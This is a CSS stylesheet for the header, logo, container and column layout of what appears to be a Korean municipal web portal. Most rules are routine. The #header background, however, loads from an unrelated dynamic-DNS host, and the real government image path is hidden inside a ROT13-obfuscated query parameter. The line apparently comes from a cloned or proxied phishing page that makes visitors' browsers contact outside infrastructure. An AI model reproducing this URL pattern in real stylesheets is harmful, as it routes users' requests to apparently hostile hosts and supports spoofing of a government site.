@charset "utf-8";

/* wrap */
.wrap {position:relative; margin:0 auto; width:1200px;}
.wrap:after {content:""; display:block; clear:both;}
@media all and (max-width:1200px) {
	.wrap {width:100%;}
}

body {font-family:"NanumSquare";}

/* container-fluid */
.container-fluid {position:relative; margin:20px auto 0; width:1140px; min-width:1140px;}
.container-fluid:after {content:""; display:block; clear:both;}

@media all and (max-width:1400px) {
	#fp-nav.right {display:none;}
}

@media all and (max-width:1200px) {
	.container-fluid {width:90%; min-width:90%; margin:0 auto;}
	.section {height:auto;}
	#fullpage {height:auto;}
}

/* header */
#header {position:relative; width:100%; min-width:1140px; height:130px; background:url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Svqrn.purbatwh.tb.xe%2Serfbheprf%2Spvgvmra2%2Syvo%2Spff%2S..%2S..%2Svztf%2Surnqre%2Surnqre_ot.tvs") repeat-x 0 0; border-bottom:1px solid #ddd;}
#header #logo {position:absolute; left:0; top:66px; line-height:0; font-size:0; z-index:90;}
@media all and (max-width:1200px) {
	#header {min-width:100%;}
}
@media all and (max-width:1024px) {
	#header {height:90px; background:none;}
	#header #logo {top:15px; left:20px; box-sizing:border-box;}
}
@media all and (max-width:767px) {
	#header {height:70px;}
	#header #logo {top:18px; text-align:left; padding:0 0 0 10px;}
	#header #logo img {height:33px;}
}


/* 메인 */
#content {position:relative; width:100%; display:block;}


/* 서브 */
#contents {
	position:relative;
	width:100%;
}
.centerColumn {
	position:relative;
	float:left;
	width:100%;
}
@media all and (max-width:1024px) {
	#content {overflow:hidden;}
	.leftColumn {display:none;}
	.centerColumn {float:none; width:100%; margin:0;}
}
